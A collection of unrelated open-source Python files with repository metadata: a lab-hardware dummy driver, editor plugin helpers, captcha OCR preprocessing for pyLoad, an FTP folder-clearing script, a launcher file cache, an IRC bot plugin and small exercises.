self._phi_axis.pos = desired_pos
def abort(self):
""" Stops movement of the stage
@return int: error code (0:OK, -1:error)
"""
self.log.info('MagnetDummy: Movement stopped!')
return 0
def get_pos(self, param_list=None):
""" Gets current position of the magnet stage arms
@param list param_list: optional, if a specific position of an axis
is desired, then the labels of the needed
axis should be passed as the param_list.
If nothing is passed, then from each axis the
position is asked.
@return dict: with keys being the axis labels and item the current
position.
"""
pos = {}
if param_list is not None:
if self._x_axis.label in param_list:
pos[self._x_axis.label] = self._x_axis.pos
if self._y_axis.label in param_list:
pos[self._y_axis.label] = self._y_axis.pos
if self._z_axis.label in param_list:
pos[self._z_axis.label] = self._z_axis.pos
if self._phi_axis.label in param_list:
pos[self._phi_axis.label] = self._phi_axis.pos
else:
pos[self._x_axis.label] = self._x_axis.pos
pos[self._y_axis.label] = self._y_axis.pos
pos[self._z_axis.label] = self._z_axis.pos
pos[self._phi_axis.label] = self._phi_axis.pos
return pos
def get_status(self, param_list=None):
""" Get the status of the position
@param list param_list: optional, if a specific status of an axis
is desired, then the labels of the needed
axis should be passed in the param_list.
If nothing is passed, then from each axis the
status is asked.
@return dict: with the axis label as key and the status number as item.
"""
status = {}
if param_list is not None:
if self._x_axis.label in param_list:
status[self._x_axis.label] = self._x_axis.status
if self._y_axis.label in param_list:
status[self._y_axis.label] = self._y_axis.status
if self._z_axis.label in param_list:
status[self._z_axis.label] = self._z_axis.status
if self._phi_axis.label in param_list:
status[self._phi_axis.label] = self._phi_axis.status
else:
status[self._x_axis.label] = self._x_axis.status
status[self._y_axis.label] = self._y_axis.status
status[self._z_axis.label] = self._z_axis.status
status[self._phi_axis.label] = self._phi_axis.status
return status
def calibrate(self, param_list=None):
""" Calibrates the magnet stage.
@param dict param_list: param_list: optional, if a specific calibration
of an axis is desired, then the labels of the
needed axis should be passed in the param_list.
If nothing is passed, then all connected axis
will be calibrated.
@return int: error code (0:OK, -1:error)
After calibration the stage moves to home position which will be the
zero point for the passed axis. The calibration procedure will be
different for each stage.
"""
if param_list is not None:
if self._x_axis.label in param_list:
self._x_axis.pos = 0.0
if self._y_axis.label in param_list:
self._y_axis.pos = 0.0
if self._z_axis.label in param_list:
self._z_axis.pos = 0.0
if self._phi_axis.label in param_list:
self._phi_axis.pos = 0.0
else:
self._x_axis.pos = 0.0
self._y_axis.pos = 0.0
self._z_axis.pos = 0.0
self._phi_axis.pos = 0.0
return 0
def get_velocity(self, param_list=None):
""" Gets the current velocity for all connected axes.
@param dict param_list: optional, if a specific velocity of an axis
is desired, then the labels of the needed
axis should be passed as the param_list.
If nothing is passed, then from each axis the
velocity is asked.
@return dict : with the axis label as key and the velocity as item.
"""
vel = {}
if param_list is not None:
if self._x_axis.label in param_list:
vel[self._x_axis.label] = self._x_axis.vel
if self._y_axis.label in param_list:
vel[self._x_axis.label] = self._y_axis.vel
if self._z_axis.label in param_list:
vel[self._x_axis.label] = self._z_axis.vel
if self._phi_axis.label in param_list:
vel[self._phi_axis.label] = self._phi_axis.vel
else:
vel[self._x_axis.label] = self._x_axis.get_vel
vel[self._y_axis.label] = self._y_axis.get_vel
vel[self._z_axis.label] = self._z_axis.get_vel
vel[self._phi_axis.label] = self._phi_axis.vel
return vel
def set_velocity(self, param_dict=None):
""" Write new value for velocity.
@param dict param_dict: dictionary, which passes all the relevant
parameters, which should be changed. Usage:
{'axis_label': <the-velocity-value>}.
'axis_label' must correspond to a label given
to one of the axis.
"""
constraints = self.get_constraints()
if param_dict.get(self._x_axis.label) is not None:
desired_vel = param_dict[self._x_axis.label]
constr = constraints[self._x_axis.label]
if not(constr['vel_min'] <= desired_vel <= constr['vel_max']):
self.log.warning('Cannot make absolute movement of the axis '
'"{0}" to possition {1}, since it exceeds the limits '
'[{2},{3}] ! Command is ignored!'.format(
self._x_axis.label,
desired_vel,
constr['vel_min'],
constr['vel_max']))
else:
self._x_axis.vel = desired_vel
if param_dict.get(self._y_axis.label) is not None:
desired_vel = param_dict[self._y_axis.label]
constr = constraints[self._y_axis.label]
if not(constr['vel_min'] <= desired_vel <= constr['vel_max']):
self.log.warning('Cannot make absolute movement of the axis '
'"{0}" to possition {1}, since it exceeds the limits '
'[{2},{3}] ! Command is ignored!'.format(
self._y_axis.label,
desired_vel,
constr['vel_min'],
constr['vel_max']))
else:
self._y_axis.vel = desired_vel
if param_dict.get(self._z_axis.label) is not None:
desired_vel = param_dict[self._z_axis.label]
constr = constraints[self._z_axis.label]
if not(constr['vel_min'] <= desired_vel <= constr['vel_max']):
self.log.warning('Cannot make absolute movement of the axis '
'"{0}" to possition {1}, since it exceeds the limits '
'[{2},{3}] ! Command is ignored!'.format(
self._z_axis.label,
desired_vel,
constr['vel_min'],
constr['vel_max']))
else:
self._z_axis.vel = desired_vel
if param_dict.get(self._phi_axis.label) is not None:
desired_vel = param_dict[self._phi_axis.label]
constr = constraints[self._phi_axis.label]
if not(constr['vel_min'] <= desired_vel <= constr['vel_max']):
self.log.warning('Cannot make absolute movement of the axis '
'"{0}" to possition {1}, since it exceeds the limits '
'[{2},{3}] ! Command is ignored!'.format(
self._phi_axis.label,
desired_vel,
constr['vel_min'],
constr['vel_max']))
else:
self._phi_axis.vel = desired_vel
def tell(self, param_dict=None):
""" Send a command to the magnet.
@param dict param_dict: dictionary, which passes all the relevant
parameters, which should be changed. Usage:
{'axis_label': <the command string>}.
'axis_label' must correspond to a label given
to one of the axis.
@return int: error code (0:OK, -1:error)
"""
self.log.info('You can tell the magnet dummy as much as you want, it '
'has always an open ear for you. But do not expect an '
'answer, it is very shy!')
return 0
def ask(self, param_dict=None):
""" Ask the magnet a question.
@param dict param_dict: dictionary, which passes all the relevant
parameters, which should be changed. Usage:
{'axis_label': <the question string>}.
'axis_label' must correspond to a label given
to one of the axis.
@return string: contains the answer coming from the magnet
"""
self.log.info('Dude, I am a dummy! Your question(s) "{0}" to the '
'axis "{1}" is/are way to complicated for me :D ! If you '
'want to talk to someone, ask Siri, maybe she will listen to '
'you and answer your questions :P.'.format(
list(param_dict.values()), list(param_dict)))
return_val = {}
for entry in param_dict:
return_val[entry] = 'Nothing to say, Motor is quite.'
return return_val
def set_magnet_idle_state(self, magnet_idle=True):
""" Set the magnet to couple/decouple to/from the control.
@param bool magnet_idle: if True then magnet will be set to idle and
each movement command will be ignored from the
hardware file. If False the magnet will react
on movement changes of any kind.
@return bool: the actual state which was set in the magnet hardware.
True = idle, decoupled from control
False = Not Idle, coupled to control
"""
self._idle_state = magnet_idle
return self._idle_state
def get_magnet_idle_state(self):
""" Retrieve the current state of the magnet, whether it is idle or not.
@return bool: the actual state which was set in the magnet hardware.
True = idle, decoupled from control
False = Not Idle, coupled to control
"""
return self._idle_state
def initialize(self):
"""
Acts as a switch. When all coils of the superconducting magnet are
heated it cools them, else the coils get heated.
@return int: (0: Ok, -1:error)
"""
raise InterfaceImplementationError('magnet_interface>initialize')
return -1
|
drogenlied/qudi
|
hardware/magnet/magnet_dummy.py
|
Python
|
gpl-3.0
| 26,940
|
# -*- coding: utf-8 -*-
# gedit CodeCompletion plugin
# Copyright (C) 2011 Fabio Zendhi Nagao
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
def get_word(piter):
a = piter.copy()
b = piter.copy()
while True:
if a.starts_line():
break
a.backward_char()
ch = a.get_char()
#if not (ch.isalnum() or ch in ['_', ':', '.', '-', '>']):
if not (ch.isalnum() or ch in "_:.->"):
a.forward_char()
break
word = a.get_visible_text(b)
return a, word
def get_document(piter):
a = piter.copy()
b = piter.copy()
while True:
if not a.backward_char():
break
while True:
if not b.forward_char():
break
return a.get_visible_text(b)
# ex:ts=4:et:
|
nagaozen/my-os-customizations
|
home/nagaozen/.gnome2/gedit/plugins/codecompletion/utils.py
|
Python
|
gpl-3.0
| 1,420
|
from greencouriers.tests import *
class TestAuthController(TestController):
def test_index(self):
response = self.app.get(url(controller='auth', action='index'))
# Test response...
|
guyromm/greencouriers
|
greencouriers/tests/functional/test_auth.py
|
Python
|
gpl-3.0
| 203
|
# -*- coding: utf-8 -*-
#
#Copyright (C) 2009 kingzero, RaNaN
#
#This program is free software; you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation; either version 3 of the License,
#or (at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
#See the GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
#
###
from __future__ import with_statement
import os
from os.path import join
from os.path import abspath
import logging
import subprocess
#import tempfile
import Image
import TiffImagePlugin
import PngImagePlugin
import GifImagePlugin
import JpegImagePlugin
class OCR(object):
__name__ = "OCR"
__type__ = "ocr"
__version__ = "0.1"
__description__ = """OCR base plugin"""
__author_name__ = "pyLoad Team"
__author_mail__ = "admin@pyload.org"
def __init__(self):
self.logger = logging.getLogger("log")
def load_image(self, image):
self.image = Image.open(image)
self.pixels = self.image.load()
self.result_captcha = ''
def unload(self):
"""delete all tmp images"""
pass
def threshold(self, value):
self.image = self.image.point(lambda a: a * value + 10)
def run(self, command):
"""Run a command"""
popen = subprocess.Popen(command, bufsize = -1, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
popen.wait()
output = popen.stdout.read() +" | "+ popen.stderr.read()
popen.stdout.close()
popen.stderr.close()
self.logger.debug("Tesseract ReturnCode %s Output: %s" % (popen.returncode, output))
def run_tesser(self, subset=False, digits=True, lowercase=True, uppercase=True):
#self.logger.debug("create tmp tif")
#tmp = tempfile.NamedTemporaryFile(suffix=".tif")
tmp = open(join("tmp", "tmpTif_%s.tif" % self.__name__), "wb")
tmp.close()
#self.logger.debug("create tmp txt")
#tmpTxt = tempfile.NamedTemporaryFile(suffix=".txt")
tmpTxt = open(join("tmp", "tmpTxt_%s.txt" % self.__name__), "wb")
tmpTxt.close()
self.logger.debug("save tiff")
self.image.save(tmp.name, 'TIFF')
if os.name == "nt":
tessparams = [join(pypath,"tesseract","tesseract.exe")]
else:
tessparams = ["tesseract"]
tessparams.extend( [abspath(tmp.name), abspath(tmpTxt.name).replace(".txt", "")] )
if subset and (digits or lowercase or uppercase):
#self.logger.debug("create temp subset config")
#tmpSub = tempfile.NamedTemporaryFile(suffix=".subset")
tmpSub = open(join("tmp", "tmpSub_%s.subset" % self.__name__), "wb")
tmpSub.write("tessedit_char_whitelist ")
if digits:
tmpSub.write("0123456789")
if lowercase:
tmpSub.write("abcdefghijklmnopqrstuvwxyz")
if uppercase:
tmpSub.write("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
tmpSub.write("\n")
tessparams.append("nobatch")
tessparams.append(abspath(tmpSub.name))
tmpSub.close()
self.logger.debug("run tesseract")
self.run(tessparams)
self.logger.debug("read txt")
try:
with open(tmpTxt.name, 'r') as f:
self.result_captcha = f.read().replace("\n", "")
except:
self.result_captcha = ""
self.logger.debug(self.result_captcha)
try:
os.remove(tmp.name)
os.remove(tmpTxt.name)
if subset and (digits or lowercase or uppercase):
os.remove(tmpSub.name)
except:
pass
def get_captcha(self, name):
raise NotImplementedError
def to_greyscale(self):
if self.image.mode != 'L':
self.image = self.image.convert('L')
self.pixels = self.image.load()
def eval_black_white(self, limit):
self.pixels = self.image.load()
w, h = self.image.size
for x in xrange(w):
for y in xrange(h):
if self.pixels[x, y] > limit:
self.pixels[x, y] = 255
else:
self.pixels[x, y] = 0
def clean(self, allowed):
pixels = self.pixels
w, h = self.image.size
for x in xrange(w):
for y in xrange(h):
if pixels[x, y] == 255:
continue
# No point in processing white pixels since we only want to remove black pixel
count = 0
try:
if pixels[x-1, y-1] != 255:
count += 1
if pixels[x-1, y] != 255:
count += 1
if pixels[x-1, y + 1] != 255:
count += 1
if pixels[x, y + 1] != 255:
count += 1
if pixels[x + 1, y + 1] != 255:
count += 1
if pixels[x + 1, y] != 255:
count += 1
if pixels[x + 1, y-1] != 255:
count += 1
if pixels[x, y-1] != 255:
count += 1
except:
pass
# not enough neighbors are dark pixels so mark this pixel
# to be changed to white
if count < allowed:
pixels[x, y] = 1
# second pass: this time set all 1's to 255 (white)
for x in xrange(w):
for y in xrange(h):
if pixels[x, y] == 1:
pixels[x, y] = 255
self.pixels = pixels
def derotate_by_average(self):
"""rotate by checking each angle and guess most suitable"""
w, h = self.image.size
pixels = self.pixels
for x in xrange(w):
for y in xrange(h):
if pixels[x, y] == 0:
pixels[x, y] = 155
highest = {}
counts = {}
for angle in xrange(-45, 45):
tmpimage = self.image.rotate(angle)
pixels = tmpimage.load()
w, h = self.image.size
for x in xrange(w):
for y in xrange(h):
if pixels[x, y] == 0:
pixels[x, y] = 255
count = {}
for x in xrange(w):
count[x] = 0
for y in xrange(h):
if pixels[x, y] == 155:
count[x] += 1
sum = 0
cnt = 0
for x in count.values():
if x != 0:
sum += x
cnt += 1
avg = sum / cnt
counts[angle] = cnt
highest[angle] = 0
for x in count.values():
if x > highest[angle]:
highest[angle] = x
highest[angle] = highest[angle] - avg
hkey = 0
hvalue = 0
for key, value in highest.iteritems():
if value > hvalue:
hkey = key
hvalue = value
self.image = self.image.rotate(hkey)
pixels = self.image.load()
for x in xrange(w):
for y in xrange(h):
if pixels[x, y] == 0:
pixels[x, y] = 255
if pixels[x, y] == 155:
pixels[x, y] = 0
self.pixels = pixels
def split_captcha_letters(self):
captcha = self.image
started = False
letters = []
width, height = captcha.size
bottomY, topY = 0, height
pixels = captcha.load()
for x in xrange(width):
black_pixel_in_col = False
for y in xrange(height):
if pixels[x, y] != 255:
if not started:
started = True
firstX = x
lastX = x
if y > bottomY:
bottomY = y
if y < topY:
topY = y
if x > lastX:
lastX = x
black_pixel_in_col = True
if black_pixel_in_col is False and started is True:
rect = (firstX, topY, lastX, bottomY)
new_captcha = captcha.crop(rect)
w, h = new_captcha.size
if w > 5 and h > 5:
letters.append(new_captcha)
started = False
bottomY, topY = 0, height
return letters
def correct(self, values, var=None):
if var:
result = var
else:
result = self.result_captcha
for key, item in values.iteritems():
if key.__class__ == str:
result = result.replace(key, item)
else:
for expr in key:
result = result.replace(expr, item)
if var:
return result
else:
self.result_captcha = result
if __name__ == '__main__':
ocr = OCR()
ocr.load_image("B.jpg")
ocr.to_greyscale()
ocr.eval_black_white(140)
ocr.derotate_by_average()
ocr.run_tesser()
print "Tesseract", ocr.result_captcha
ocr.image.save("derotated.jpg")
|
estaban/pyload
|
module/plugins/captcha/captcha.py
|
Python
|
gpl-3.0
| 9,726
|
""" nenga.address.migrations module """
|
mkouhei/nenga
|
nenga/address/migrations/__init__.py
|
Python
|
gpl-3.0
| 40
|
from random import randrange
MAX = 100000
args = [randrange(MAX) for x in range(2 * MAX)]
args1 = [randrange(MAX) for x in range(MAX)]
args2 = [randrange(MAX) + MAX for x in range(MAX)]
def mkdel(s):
return "delete " + str(s)
def mkins(s):
return "insert " + str(s)
def mknext(s):
return "next " + str(s)
print ("\n".join(map(mkins, args1)) \
+ "\n" + "\n".join(map(mkins, args2)) \
+ "\n" + "\n".join(map(mknext, args)))
|
zakharvoit/discrete-math-labs
|
Season2/BinaryTrees/Tree23/gen.py
|
Python
|
gpl-3.0
| 449
|
"""
By starting at the top of the triangle below and moving to adjacent
numbers on the row below, the maximum total from top to bottom is 23.
3
7 4
2 4 6
8 5 9 3
That is, 3 + 7 + 4 + 9 = 23.
Find the maximum total from top to bottom of the triangle below:
{{ 18_input.txt }}
NOTE: As there are only 16384 routes, it is possible to solve this problem
by trying every route. However, Problem 67 is the same challenge with
a triangle containing one-hundred rows; it cannot be solved by brute
force, and requires a clever method! ;o)
"""
from os.path import dirname, abspath, join
if __name__ == '__main__':
with open(join(dirname(abspath(__file__)), '18_input.txt')) as f:
lines = f.read().splitlines()
rows = [[int(y) for y in x.split()] for x in lines if x]
for i in range(1, len(rows)):
rows[i][0] += rows[i-1][0]
rows[i][-1] += rows[i-1][-1]
for j in range(1, len(rows[i]) - 1):
rows[i][j] += max(rows[i-1][j-1], rows[i-1][j])
max_total = max(rows[-1])
print(max_total)
|
smnslwl/project_euler
|
18/18.py
|
Python
|
gpl-3.0
| 1,238
|
p = 'noobie'
if p == 'hacking':
print('Hack the planet!')
else:
print('Falso')
'''
A condição retornou falso pq
o valor atribuído em p não é igual a hacking
'''
|
zirou30/python_student
|
64.py
|
Python
|
gpl-3.0
| 174
|
import jarray
g = gs.open(gs.args[0])
istates = gs.associated(g, "initialState", True).getInitialStates()
ssrv = gs.service("stable")
def copy_path(values, coreNodes):
n = len(coreNodes)
path = jarray.zeros(n, 'b')
i = 0
for idx in coreNodes:
path[i] = values[idx]
i += 1
return path
def unfold_rec(values, jokers, stack, coreNodes):
if len(jokers) < 1:
path = copy_path(values, coreNodes)
if False:
for p in stack:
idx = 0
ident = True
for v in p:
if v != path[idx]:
ident = False
break
idx += 1
if ident:
return
stack.append( path )
return
idx, mx = jokers[0]
njk = jokers[1:]
for v in xrange(mx):
values[idx] = v
unfold_rec(values, njk, stack, coreNodes)
values[idx] = -1
def unfold(values, maxvalues, stack, coreNodes):
n = len(values)
jokers = [ (idx, maxvalues[idx]+1) for idx in xrange(n) if values[idx] == -1 ]
unfold_rec(values, jokers, stack, coreNodes)
return stack
def find_stable_states(model, nodeOrder):
maxvalues = []
coreNodes = []
inputNodes = []
coreOrder = []
idx = 0
for n in nodeOrder:
if n.isInput():
inputNodes.append(idx)
else:
coreNodes.append(idx)
coreOrder.append(n)
maxvalues.append( n.getMaxValue() )
idx += 1
unfoldNodes = xrange(len(coreNodes))
searcher = ssrv.getStableStateSearcher(model)
searcher.call()
paths = searcher.getPaths()
values = paths.getPath()
stack = []
for l in paths:
path = copy_path(values, coreNodes)
#stack.append(l)
unfold(path, maxvalues, stack, unfoldNodes)
for path in stack:
name = istates.nameState(path, coreOrder)
if name is None:
name = ""
state = ""
for v in path:
if v < 0: state += "*"
else: state += "%d" % v
print name + "\t" + state
# Get stable states for all perturbations
model = g.getModel()
find_stable_states(model, g.getNodeOrder())
|
ComputationalSystemsBiology/GINsimScripts
|
stable_core/stable_core.py
|
Python
|
gpl-3.0
| 2,265
|
#!/usr/bin/env python
import ftplib
import os.path
import sys
p_debug = False
def ftp_rmdir(ftp, folder, remove_toplevel, dontremove):
for filename, attr in ftp.mlsd(folder):
if attr['type'] == 'file' and filename not in dontremove:
if p_debug:
print(
'removing file [{0}] from folder [{1}]'.format(filename, folder))
ftp.delete(os.path.join(folder, filename))
if attr['type'] == 'dir':
ftp_rmdir(ftp, filename, True, dontremove)
if remove_toplevel:
if p_debug:
print('removing folder [{0}]'.format(folder))
ftp.rmd(folder)
def main():
p_host = sys.argv[1]
p_user = sys.argv[2]
p_pass = sys.argv[3]
p_dir = sys.argv[4]
if p_debug:
print(p_host)
print(p_user)
print(p_pass)
print(p_dir)
ftp = ftplib.FTP(p_host)
ftp.login(user=p_user, passwd=p_pass)
# ftp_rmdir(ftp, p_dir, False, set(['.ftpquota']))
ftp_rmdir(ftp, p_dir, False, set())
ftp.quit()
if __name__ == '__main__':
main()
|
veltzer/demos-python
|
src/examples/short/ftp/ftp_rmdir.py
|
Python
|
gpl-3.0
| 1,089
|
# Bulletproof Arma Launcher
# Copyright (C) 2017 Lukasz Taczuk
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
from __future__ import unicode_literals
import errno
import hashlib
import os
from utils import paths
from utils import context
def get_cache_directory():
return paths.get_launcher_directory('filecache')
def map_file(url):
"""Get the path where the file should be stored in the cache."""
file_name = hashlib.sha256(url).hexdigest()
return os.path.join(get_cache_directory(), file_name)
def get_file(url):
"""Get the file contents from the cache or None if the file is not present
in the cache.
"""
path = map_file(url)
f = None
try:
f = open(path, 'rb')
return f.read()
except IOError as ex:
if ex.errno == errno.ENOENT: # No such file
return None
raise
finally:
if f:
f.close()
def save_file(url, data):
"""Save the file contents to the cache.
The contents of the file are saved to a temporary file and then moved to
ensure that no truncated file is present in the cache.
"""
# Ensure the directory exists
paths.mkdir_p(get_cache_directory())
path = map_file(url)
tmp_path = path + '_tmp'
f = open(tmp_path, 'wb')
f.write(data)
f.close()
# Ensure the file does not exist (would raise an exception on Windows
with context.ignore_nosuchfile_exception():
os.unlink(path)
os.rename(tmp_path, path)
|
overfl0/Bulletproof-Arma-Launcher
|
src/utils/filecache.py
|
Python
|
gpl-3.0
| 1,887
|
from phystricks import *
def QWEHooSRqSdw():
pspict,fig = SinglePicture("QWEHooSRqSdw")
pspict.dilatation(3)
A=Point(0,0)
O=Point(0,2)
B=Point(3,0)
s1=Segment(A,O)
s2=Segment(O,B)
angle=AngleAOB(A,O,B,r=0.7)
angle.put_mark(text="\( c\)",pspict=pspict)
pspict.DrawGraphs(angle,s1,s2)
fig.no_figure()
fig.conclude()
fig.write_the_file()
|
LaurentClaessens/phystricks
|
testing/demonstration/phystricksQWEHooSRqSdw.py
|
Python
|
gpl-3.0
| 390
|
###
# Copyright (c) 2015, KG-Bot
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import json
import datetime
import time
import supybot.ircmsgs as ircmsgs
import supybot.schedule as schedule
import supybot.conf as conf
import supybot.utils as utils
from supybot.commands import *
import supybot.plugins as plugins
import supybot.ircutils as ircutils
import supybot.callbacks as callbacks
try:
from supybot.i18n import PluginInternationalization
_ = PluginInternationalization('RequestBot')
except ImportError:
# Placeholder that allows to run the plugin on a bot
# without the i18n module
_ = lambda x:x
class RequestBot(callbacks.Plugin):
"""Plugin is used to automate bot requests for some channel."""
threaded = True
def __init__(self):
self.__parent = super(RequestBot, self)
self.__parent.__init__(irc)
self.dailyChecksInterval = conf.supybot.plugins.RequestBot.dailyCheckInterval()
self.stopDailyCheck = conf.supybot.plugins.RequestBot.stopDailyCheck()
self.numberOfChecks = conf.supybot.plugins.RequestBot.numberOfChecks()
self.numberOfValidUsers = conf.supybot.plugins.RequestBot.numberOfValidUsers()
def _logError(self, message):
with open("local\log.txt", "a") as logFile:
logFile.write("\n")
logFile.write(message)
def _checkChannelBan(self, channel):
try:
with open("plugins/RequestBot/local/channelBans.json", "r") as bans:
banList = json.loads(bans.read())
if channel.lower() not in banList.keys():
return "Valid"
else:
return "Banned"
except Exception as e:
today_date = datetime.datetime.today().strftime("[%Y-%m-%d %H:%M:%S]")
self._logError("%s - %s" % (today_date, str(e)))
return "Error"
def _checkRequesterBan(self, nick):
try:
with open("plugins/RequestBot/local/nickBans.json", "r") as nicks:
banList = json.loads(nicks.read())
if nick.lower() not in banList.keys():
return "Valid"
else:
return "Banned"
except Exception as e:
today_date = datetime.datetime.today().strftime("[%Y-%m-%d %H:%M:%S]")
self._logError("%s - %s" % (today_date, str(e)))
return "Error"
def _populateNicks(self, users):
with open("plugins/RequestBot/local/invalidNicks.json", "r") as nicks:
invalidNicks = json.loads(nicks.read())
numberOfInvalidUsers = 0
for user in users:
for nick in invalidNicks:
if user.lower() == nick:
numberOfInvalidUsers += 1
numberOfValidUsers = len(users) - numberOfInvalidUsers
if numberOfValidUsers >= self.numberOfValidUsers:
return "Valid"
else:
return "Invalid"
def _getDailyChecks(self, channel):
with open("plugins/RequestBot/local/dailyChecks.json", "r") as dailyChecks:
channels = json.loads(dailyChecks.read())
if channels != "{}" and channel in channels.keys():
return channels
else:
return "Error"
def _dailyCheckOfUsers(self, irc, msg, adminPlugin, channel, eventName):
numberOfChecks = self._getDailyChecks(channel)
if numberOfChecks <= self.numberOfChecks: #TODO Change this because numberOfChecks will return dict of items
if channel in irc.state.channels:
users = irc.state.channels[channel].users
validNicks = self._populateNicks(users)
if validNicks == "Invalid":
adminPlugin.part(irc, msg, [channel, partMsg])
def _channelState(self, irc, msg, nick, channel, adminPlugin):
"""Collects users from <channel> and determines if <nick> is owner or admin"""
channels = irc.state.channels
if channel in channels:
users = irc.state.channels[channel].users
# This checks number of valid users on channel
validNicks = self._populateNicks(users)
if validNicks == "Valid":
owners = irc.state.channels[channel].owners
# If owners are not empty that means ownermode is set and user must have +q
# mode to request bot
if len(owners) != 0:
if nick in owners:
eventName = "%s_RequestBot_dailyChecks" % channel
stopEventName = "%s_RequestBot_stopDailyChecks" % channel
# We must schedule it this way because we can't pass args in schedule...
def startDailyChecks():
# We are checking channel users for few days because one might try
# to bring a lot of users when he requests bot and later those users
# will part channel and never come back again
self._dailyCheckOfUsers(irc, msg, adminPlugin, channel, eventName)
# We're scheduling this to be run few times a day for few days and at the last
# time we're going to check if there where minimum users on the channel
# for most of the time
# TODO: Implement last check
schedule.addPeriodicEvent(startDailyChecks, self.dailyChecksInterval, eventName, now=False)
def stopDailyChecks():
# We must schedule it here because if we do it elswhere we won't be able to
# access new state of scheduler which holds reference to our scheduled event
schedule.removeEvent(eventName)
schedule.addEvent(stopDailyChecks, time.time() + self.stopDailyCheck, stopEventName)
greetMsg = "Hi, I've been assigned here thanks to %s. If you have any questions use +list or come to #KG-Bot and ask." % nick
irc.queueMsg(ircmsgs.privmsg(channel, greetMsg))
else:
partMsg = "You're not owner (with +q set) so you can't have me in here."
irc.queueMsg(ircmsgs.privmsg(channel, partMsg))
adminPlugin.part(irc, msg, [channel, partMsg])
# If there are no owners with +q mode set we're not going to allow admins or ops
# to request bot, we're forcing players to use ownermode and +q so only true channel owner
# can request bot (you never know what admins can try to do)
else:
partMsg = "There are no owners in here (with +q set)."
irc.queueMsg(ircmsgs.privmsg(channel, partMsg))
adminPlugin.part(irc, msg, [channel, partMsg])
else:
partMsg = "You don't have enough users in here."
irc.queueMsg(ircmsgs.privmsg(channel, partMsg))
adminPlugin.part(irc, msg, [channel, partMsg])
# This should never happen, maybe only if bot is kicked from channel before
# scheduled event for this command has been executed
else:
partMsg = "There was something strange internally. Please notify my owner about this."
irc.queueMsg(ircmsgs.privmsg(channel, partMsg))
adminPlugin.part(irc, msg, [channel, partMsg])
def request(self, irc, msg, args, channel, reason):
"""<channel> - channel name for which you make request, <reason> - reason why do you want bot (it must be some good reason, not some bullshit)
Request bot for <channel>, you must specify <reason> why do you want it."""
# TODO: Before anything happens we should check if <channel> is valid IRC channel name
# because if it's not we won't be able to join it, collect irc.state and our code will
# probably brake in the unwanted manner
#TODO: If we're already on channel nothing should be done and user should be
# presented with explanation (we still have to implement that in our code)"""
nick = msg.nick
isChannelBanned = self._checkChannelBan(channel)
# TODO: change this because this will probably return dict of more info about ban
if isChannelBanned == "Valid":
isRequesterBanned = self._checkRequesterBan(nick)
# TODO: Change this because this will probably behave like channel ban and will return dict
if isRequesterBanned == "Valid":
# We're doing it this way because it's much more easier than trying to reimplement
# admin join function with all those network, group, et. stuff
adminPlugin = irc.getCallback("Admin")
adminPlugin.join(irc, msg, [channel.lower()])
# We must schedule this command because when bot joins some channel it neads few seconds
# to collect irc.state and we can't access those right after the join
schedule.addEvent(self._channelState, time.time() + 5, args=[irc, msg, nick, channel, adminPlugin])
elif isRequesterBanned == "Banned":
irc.reply("You can't request bot becuase you're on ban list.")
else:
irc.reply("There was some ugly internal error. Please try again and notify my owner about this.")
elif isChannelBanned == "Banned":
irc.reply("This channel is banned and you can't request bot for it.")
else:
irc.reply("There was some ugly internal error. Please try again and notify my owner about this.")
request = wrap(request, ["channel", "something"])
Class = RequestBot
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
kg-bot/SupyBot
|
plugins/RequestBot/plugin.py
|
Python
|
gpl-3.0
| 11,545
|
import pytest
import tempfile
import shutil
import os
import music_rename
from music_rename import checksum
@pytest.fixture()
def empty(request):
dir = tempfile.mkdtemp()
os.mknod(os.path.join(dir, 'empty.txt'))
def cleanup():
shutil.rmtree(dir)
request.addfinalizer(cleanup)
return os.path.join(dir, 'empty.txt')
@pytest.fixture()
def not_empty(request):
